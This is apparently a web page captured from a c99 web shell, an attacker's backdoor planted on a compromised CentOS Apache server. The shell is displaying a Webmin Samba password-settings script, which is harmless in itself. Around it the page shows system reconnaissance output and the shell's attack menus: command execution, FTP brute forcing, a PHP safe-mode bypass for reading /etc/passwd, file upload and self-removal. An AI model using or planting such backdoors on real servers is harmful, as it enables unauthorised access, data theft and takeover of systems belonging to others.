!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/samba/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     conf_pass.cgi (2.36 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# conf_pass.cgi
# Display password options options

require './samba-lib.pl';

# check acls

&error_setup("$text{'eacl_aviol'}ask_epass.cgi");
&error("$text{'eacl_np'} $text{'eacl_pcp'}") unless $access{'conf_pass'};

&ui_print_header(undef, $text{'passwd_title'}, "");

&get_share("global");

print &ui_form_start("save_pass.cgi", "post");
print &ui_table_start($text{'passwd_title'}, undef, 2);

print &ui_table_row($text{'passwd_encrypt'},
    &yesno_input("encrypt passwords"));

print &ui_table_row($text{'passwd_allownull'},
    &yesno_input("null passwords"));

print &ui_table_row($text{'passwd_program'},
    &ui_opt_textbox("passwd_program", &getval("passwd program"), 25,
            $text{'default'}));

print &ui_table_row($text{'passwd_sync'},
    &yesno_input("unix password sync"));

$pc = &getval("passwd chat");
$chat = &ui_radio("passwd_chat_def", $pc eq "" ? 1 : 0,
          [ [ 1, $text{'default'} ],
            [ 0, $text{'passwd_below'} ] ])."<br>\n";
$chat .= &ui_columns_start([ $text{'passwd_waitfor'},
                 $text{'passwd_send'} ]);
while($pc =~ /^"([^"]*)"\s*(.*)/ || $pc =~ /^(\S+)\s*(.*)/) {
    if ($send) { push(@send, $1); $send = 0; }
    else { push(@recv, $1); $send = 1; }
    $pc = $2;
    }
for($i=0; $i<(@recv < 5 ? 5 : @recv+1); $i++) {
    $chat .= &ui_columns_row([
        &ui_textbox("chat_recv_$i",
                $recv[$i] eq "." ? "" : $recv[$i], 20),
        &ui_textbox("chat_send_$i", $send[$i], 20),
        ]);
    }
$chat .= &ui_columns_end();
print &ui_table_row($text{'passwd_chat'}, $chat);

$map = &ui_radio("username_map_def", &getval("username map") eq "" ? 1 : 0,
         [ [ 1, $text{'config_none'} ],
           [ 0, $text{'passwd_below'} ] ])."<br>\n";
$map .= &ui_columns_start([ $text{'passwd_unixuser'},
                $text{'passwd_winuser'} ]);
open(UMAP, &getval("username map"));
while(<UMAP>) {
    s/\r|\n//g;
    s/[#;].*$//g;
    if (/^\s*(\S+)\s*=\s*(.*)$/) {
        local $uunix = $1;
        local $rest = $2;
        while($rest =~ /^\s*"([^"]*)"(.*)$/ ||
              $rest =~ /^\s*(\S+)(.*)$/) {
            push(@uunix, $uunix);
            push(@uwin, $1);
            $rest = $2;
            }
        }
    }
close(UMAP);
for($i=0; $i<@uunix+1; $i++) {
    $map .= &ui_columns_row([
        &ui_textbox("umap_unix_$i", $uunix[$i], 15),
        &ui_textbox("umap_win_$i", $uwin[$i], 30),
        ]);
    }
$map .= &ui_columns_end();
print &ui_table_row($text{'passwd_map'}, $map);

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'save'} ] ]);

&ui_print_footer("", $text{'index_sharelist'});

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0161 ]--